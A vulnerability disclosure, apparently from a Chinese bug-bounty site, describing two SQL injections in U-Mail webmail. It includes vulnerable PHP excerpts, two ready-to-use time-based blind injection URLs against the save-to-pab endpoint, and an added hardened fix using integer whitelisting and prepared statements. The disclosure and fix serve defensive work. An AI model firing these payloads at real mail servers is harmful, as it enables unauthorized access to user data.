### Brief description:

The big names have all gone off to dig into cmseasy, while I'm still digging into umail.

### Details:

Sqli 1: `\client\mail\module\o_mail.php` Line: 559

```
if ( ACTION == "mail-send" ) {
    ...
    if ( !$attach_list ) {
        $attach_list = array( );
    }
    if ( $_FILES ) {
        ...
    }
    $netdisk_files_id = gss( $_POST['nd_select_file'] );
    $nd_send_files_id = gss( $_POST['nd_send_file'] );
    if ( $nd_send_files_id && $netdisk_files_id ) {
        $netdisk_files_id = implode( ",", array( $netdisk_files_id, $nd_send_files_id ) );
        $netdisk_files_id = $nd_send_files_id;
    }
    if ( $netdisk_files_id ) {
        include_once( LIB_PATH."Netdisk.php" );
        $Netdisk = Netdisk::getinstance( );
        $netdiskFileArr = $Netdisk->getFileByIDS( $user_id, $netdisk_files_id ); // follow this call
        ...
```

The variable `netdisk_files_id` above is passed into the `getFileByIDS` method; following that method:

```
public function getFileByIDS( $userid, $netdisk_files_id, $fields = "*", $debug = FALSE ) {
    // netdisk_files_id is concatenated into the SQL statement here without any filtering; let's look at the injection.
    $_obfuscate_IRFhnYw = "user_id='".$userid."' AND file_id IN (".$netdisk_files_id.")";
    $_obfuscate_6RYLWQ = $this->get_file( array(
        "fields"  => $fields,
        "where"   => $_obfuscate_IRFhnYw,
        "orderby" => "file_name",
        "debug"   => $debug
    ) );
    return $_obfuscate_6RYLWQ;
}
```

First check manually whether the injection exists:

![QQ20140903-1@2x.png](https://images.seebug.org/upload/201409/03183530b4779025468c161c64cb6177620513d7.png)

### Proof of vulnerability:

![QQ20140903-2@2x.png](https://images.seebug.org/upload/201409/031836596622aed9dd12e81b175e67e06b60146b.png)

Sqli 2: (same idea as this vulnerability I submitted earlier: http://wooyun.org/bugs/wooyun-2010-072963)

File: `client\oabshare\module\operates.php` Line: 235

```
if ( ACTION == "save-to-pab" ) {
    .....
```

Payloads directly:

1. `http://mail.domain.com:8099/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&userlist=1) or if(1=11, 0, sleep(5))%23` — because 1 != 11, the trailing `sleep(5)` executes and the response is slow.
2. `http://mail.domain.com:8099/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&userlist=1) or if(1=1, 0, sleep(5))%23` — because 1 = 1, this one returns quickly.
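Both injections in this report share one root cause: a comma-separated list of IDs taken from the request is spliced straight into an `IN (...)` clause. The following is an added example written for this page, not U-Mail's code or the author's; it shows the defensive pattern that closes both holes: whitelist every element as a plain integer and bind the list through placeholders. The table name `netdisk_file`, the column names, the sample rows and the SQLite backend are assumptions constructed for the demo.

```php
<?php
// Added example (not U-Mail's code): a hardened replacement for the pattern
// "file_id IN (" . $netdisk_files_id . ")" seen in getFileByIDS(), and for the
// equivalent userlist parameter handled by save-to-pab. Table/column names
// and the sample rows below are assumptions constructed for this demo.

declare(strict_types=1);

/**
 * Normalise a caller-supplied ID list ("3,7,12" or an array) into a list of
 * positive integers. Anything that is not a plain decimal integer is rejected,
 * so a value such as "1) or if(1=11,0,sleep(5))#" never reaches the query.
 */
function parseIdList(string|array $raw, int $max = 200): array
{
    $parts = is_array($raw) ? $raw : explode(',', $raw);
    $ids = [];
    foreach ($parts as $part) {
        $part = trim((string) $part);
        if ($part === '') {
            continue;
        }
        // ctype_digit refuses signs, spaces, quotes, parentheses, etc.
        if (!ctype_digit($part) || strlen($part) > 18) {
            throw new InvalidArgumentException("invalid id: " . $part);
        }
        $ids[] = (int) $part;
    }
    $ids = array_values(array_unique($ids));
    if ($ids === [] || count($ids) > $max) {
        throw new InvalidArgumentException("id list empty or too long");
    }
    return $ids;
}

/**
 * Parameterised counterpart of getFileByIDS(): one "?" per ID, user_id bound
 * as well, so the WHERE clause is never assembled from request strings.
 */
function getFileByIds(PDO $db, int $userId, string|array $rawIds): array
{
    $ids = parseIdList($rawIds);
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT file_id, file_name FROM netdisk_file
            WHERE user_id = ? AND file_id IN ($placeholders)
            ORDER BY file_name";
    $stmt = $db->prepare($sql);
    $stmt->execute([$userId, ...$ids]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- demo against an in-memory SQLite database (constructed sample data) ---
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE netdisk_file (file_id INTEGER, user_id INTEGER, file_name TEXT)");
$db->exec("INSERT INTO netdisk_file VALUES (1, 10, 'report.pdf'), (2, 10, 'notes.txt'), (3, 11, 'other.doc')");

// Legitimate request: only the caller's own files (user 10) come back; id 3 belongs to user 11.
print_r(getFileByIds($db, 10, "1,2,3"));

// Request shaped like the payloads in this report: rejected before any SQL runs.
try {
    getFileByIds($db, 10, "1) or if(1=11, 0, sleep(5))#");
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . PHP_EOL;
}
```

The integer whitelist is the primary control; the placeholders are defence in depth. Applying the same `parseIdList` step to `userlist` in `save-to-pab` removes the time-based injection shown in Sqli 2, because the `if(...)`/`sleep(5)` text can no longer be part of the statement.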